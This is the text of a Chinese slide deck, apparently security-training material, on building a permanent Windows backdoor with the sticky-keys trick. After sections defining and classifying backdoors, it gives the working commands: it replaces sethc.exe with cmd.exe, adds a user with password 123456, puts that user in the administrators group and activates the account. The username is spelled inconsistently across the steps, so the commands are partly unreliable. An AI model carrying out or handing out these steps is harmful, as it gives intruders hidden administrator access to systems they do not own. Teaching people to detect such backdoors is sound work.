利用shift在五次粘滞键建立系统永久后门.pptxVIP

利用Shift五次粘滞键建立系统永久后门 功能介绍 Windows中的粘滞键是专为同时按下两个或多个键有困难的人设计的。 粘滞键的主要功能是方便Shift、Ctrl、Alt与其他键的组合使用。 在我们使用热键时，例如“CTRL+C”，用粘滞键就可以一次只按一个键来完成复制的功能。 启动粘滞键可通过单击“开始→设置→控制面板→辅助功能选项”，在“键盘”选项卡下选中“使用粘滞键”来启动。 在开启粘滞键的时候，任务栏右边的系统托盘区会出现粘滞键图标。 如果想关闭粘滞键，只需将“使用粘滞键”前的钩消除就可以。 系统后门 后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。 在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。 如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。 后门的定义 后门程序又称特洛依木马，其用途在于潜伏在电脑中，从事搜集信息或便于黑客进入的动作。 后门程序和电脑病毒最大的差别，在于后门程序不一定有自我复制的动作，也就是后门程序不一定会“感染”其它电脑。 后门是一种登录系统的方法，它不仅绕过系统已有的安全设置，而且还能挫败系统上各种增强的安全设置。 后门的类型 后门包括从简单到奇特，有很多的类型。 简单的后门可能只是建立一个新的账号，或者接管一个很少使用的账号;复杂的后门(包括木马)可能会绕过系统的安全认证而对系统有完全存取权。 例如一个login程序，你当输入特定的密码时，你就能以管理员的权限来存取系统。 后门的类型二 后门能相互关联，而且这个技术被许多黑客所使用。 例如，黑客可能使用密码破解一个或多个账号密码，黑客可能会建立一个或多个账号。一个黑客可以存取这个系统，黑客可能使用一些 技术或利用系统的某个漏洞来提升权限。 黑客可能会对系统的配置文件进行小部分的修改，以降低系统的防卫性能。也可能会安装一个木马程序，使系统打开一个安全漏洞，以利于黑客完全掌握系统。 后门的分类 网页后门 　　此类后门程序一般都是服务器上正常 的web服务来构造自己的连接方式，比如现在非常流行的ASP、cgi脚本后门等。较为流行的有海洋顶瑞、一句话后门。 后门的分类 线程插入后门 　　利用系统自身的某个服务或者进程，将后门程序插入到其中。 例如有段时间闹的比较火的svch0st.exe ,svchost.exe植入。 后门的分类 扩展后门 　　所谓的“扩展”，是指在功能上有大的提升，比普通的单一功能的后门有很强的使用性，这种后门本身就相当于一个小的安全工具包，能实现非常多的常驻见安全功能，有段时间调试出来360软件后门，暴风影音后门等。 后门的分类 应用程序后门　　 利用应用程序的一些自身缺陷，而编写出来的后门，通过原文件替换的方式，将加入后门的应用程序进行提供下载服务。 最近的Putty后门就是其中的一个模式。 后门的弱点 一般的后门都不能很好的隐蔽，因为他们都要进行通信，通过抓包工具，就能获得相应的后门程序，如果是C /S 的模式，服务端和客户端都极易被人发现和控制。 什么样的后门才是最好的后门 系统级的后门才是最好的后门，因为他不易被发现，利用系统的漏洞来利用，通过将原系统文件替换，一般不去检查对应文件大小或者原文件位置比对的话，很难被发现。 Shift5次粘滞键后门制作 将C盘windows 目录下面的system32文件里面的sethc.exe应用程序进行转移，并生成sethc.exe.bak文件。 并将cmd.exe拷贝覆盖sethc.exe 执行命令如下： C:\cd windows \system32 move sethc.exe sethc.exe.bak copy cmd.exe sethc.exe 命令执行成功 Shift 5次粘滞键执行成功 执行命令操作 net user 查看用户列表 执行命令操作 进入DOS窗口输入如下命令，增加用户名为jakcson的用户密码为123456 net user jakcson 123456 /add 执行命令操作 进入DOS窗口输入如下命令： 将jackson附属administrators组属性 net localgroup administrators jackson /add 执行命令操作 进入DOS窗口输入如下命令： net user Jackson /active:yes 验证过程 验证过程 验证为管理员权限 THANKS! 工信部教育与考试中心 网络信息安全工程师高级职业教育项目组